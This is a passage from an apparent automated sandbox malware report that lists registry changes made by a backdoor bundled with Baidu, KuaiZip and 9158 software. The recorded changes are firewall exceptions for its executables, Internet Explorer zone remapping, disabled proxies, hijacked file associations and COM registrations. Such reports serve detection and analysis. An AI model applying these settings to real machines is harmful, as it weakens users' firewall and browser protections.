"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Baidu.exe:3808 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 83 F0 44 06 08 34 FA 73 95 60 45 82 E4 43 33"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduUpdate.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe:*:Enabled:BaiduUpdate.exe"

The Backdoor adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduUpdate.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe:*:Enabled:BaiduUpdate.exe"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe:*:Enabled:Baidu.exe"

The Backdoor adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduBugRpt.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe:*:Enabled:BaiduBugRpt.exe"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduBugRpt.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe:*:Enabled:BaiduBugRpt.exe"

The Backdoor adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe:*:Enabled:Baidu.exe"

The process Baidu.exe:2720 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 8D 11 32 C0 F2 12 05 E0 C5 12 89 7D 5F AB 1B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

The process Baidu.exe:4000 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 95 B0 FB CF 2F BE 5F F0 66 EF 6F 33 11 B2 A7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

The process Baidu.exe:4016 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 FC A9 5B 5D 48 63 18 4F A0 9B 5D D5 97 13 5E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

The process Baidu.exe:3800 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 6A 5B 90 76 06 FB 2E 12 0D AF B0 98 6B 2B F8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process Baidu.exe:324 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 81 43 26 36 48 A8 57 55 4D 2D 16 80 96 5B CF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process KZMount.exe:1976 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 F2 2A 02 1F 91 0B 9D 90 B8 AC A2 CE D5 78 A7"

The process KZMount.exe:1772 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCR\KuaiZipMount.vcd\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\KuaiZipMount.nrg\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.cue\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\KuaiZipMount.isz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.mds\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\KuaiZipMount.flac\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\KuaiZipMount.bin\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount_FileAsso.Origin\.isz]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\.wv]
"(Default)" = "KuaiZipMount.wv"

[HKCR\KuaiZipMount_FileAsso.Origin\.bin]
"(Default)" = ""

[HKCR\KuaiZipMount_FileAsso.Origin\.ape]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.nrg\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\.ape]
"(Default)" = "KuaiZipMount.ape"

[HKCR\KuaiZipMount.vcd\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.mdf\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\.bin]
"(Default)" = "KuaiZipMount.bin"

[HKCR\.ccd]
"(Default)" = "KuaiZipMount.ccd"

[HKCR\KuaiZipMount_FileAsso.Origin\.ccd]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.ccd\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.iso\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount_FileAsso.Origin\.mds]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount_FileAsso.Origin\.wv]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.mdf\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.ape\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount_FileAsso.Origin\.iso]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\.vcd]
"(Default)" = "KuaiZipMount.vcd"

[HKCR\.mds]
"(Default)" = "KuaiZipMount.mds"

[HKCR\.cue]
"(Default)" = "KuaiZipMount.cue"

[HKCR\KuaiZipMount_FileAsso.Origin\.vcd]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.mds\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.bin\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 69 65 5C 77 04 4C 00 4E 38 57 AB CA 3F 19 00"

[HKCR\KuaiZipMount.iso\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\.flac]
"(Default)" = "KuaiZipMount.flac"

[HKCR\KuaiZipMount.wv\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount_FileAsso.Origin\.flac]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.cue\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\.iso]
"(Default)" = "KuaiZipMount.iso"

[HKCR\KuaiZipMount_FileAsso.Origin\.nrg]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.wv\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\KuaiZipMount_FileAsso.Origin\.mdf]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.ccd\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\.mdf]
"(Default)" = "KuaiZipMount.mdf"

[HKCR\.isz]
"(Default)" = "KuaiZipMount.isz"

[HKCR\KuaiZipMount.isz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\KuaiZipMount_FileAsso.Origin\.cue]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.ape\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe,0"

[HKCR\KuaiZipMount.flac\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZMount.exe -NewDriver %1"

[HKCR\.nrg]
"(Default)" = "KuaiZipMount.nrg"

The process 9158.exe:3180 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\9158web]
"VideoDevice" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\9158web]
"TopLevel" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\9158web]
"LastLoginType" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\9158web]
"HallWnd1" = "131452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\9158web]
"IsGuest" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 69 E9 2A 4C 79 D3 B6 51 E2 48 97 D7 4E 19 18"

[HKLM\SOFTWARE\9158web]
"HallWnd" = "131452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following registry key(s):

[HKLM\SOFTWARE\9158web\120025]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BugReport.exe:3376 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 09 4E 1B 15 B3 57 F3 7C 34 FF FF E9 9D EB 4A"

The process BugReport.exe:3248 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F CA DF 1F 35 E5 2A 27 2A E8 88 5A 1F 92 A0 47"

The process regsvr32.exe:1700 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 68 0E 0A 10 C5 FA 12 CF 76 9D 3F 88 26 23 0A"

The process regsvr32.exe:2620 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 36 C2 3E 67 11 82 3E 25 5B 50 71 81 5D AE 2E"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
"ThreadingModel" = "Apartment"

[HKCR\WebVideo.ExeClient]
"(Default)" = "ExeClient Class"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0]
"(Default)" = "WebVideo 1.0 Type Library"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\WebVideo.ExeClient.1]
"(Default)" = "ExeClient Class"

[HKCR\WebVideo.ExeClient\CurVer]
"(Default)" = "WebVideo.ExeClient.1"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}]
"(Default)" = "ExeClient Class"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}]
"(Default)" = "IExeClient"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\VersionIndependentProgID]
"(Default)" = "WebVideo.ExeClient"

[HKCR\WebVideo.ExeClient\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\TypeLib]
"Version" = "1.0"
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WebVideo.ExeClient.1\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\ProgID]
"(Default)" = "WebVideo.ExeClient.1"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\TypeLib]
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"

The process regsvr32.exe:2520 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E 09 F0 B4 B7 92 EE 0A D2 62 B6 D2 62 1F 67 83"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Invoker9158 1.0 Type Library"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IInvokeChat"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

The process regsvr32.exe:2444 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0]
"(Default)" = "ImageOle 1.0 Type Library"

[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"Version" = "1.0"

[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"

[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}]
"(Default)" = "IGifAnimator"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 FB 03 18 F5 83 F9 C5 9A C5 14 30 48 72 8B E4"

[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"

The process regsvr32.exe:596 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 14 56 33 55 36 E4 4B FD 48 EA E6 83 5A 9E 02"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker]
"Description" = "快压软件升级检查服务"

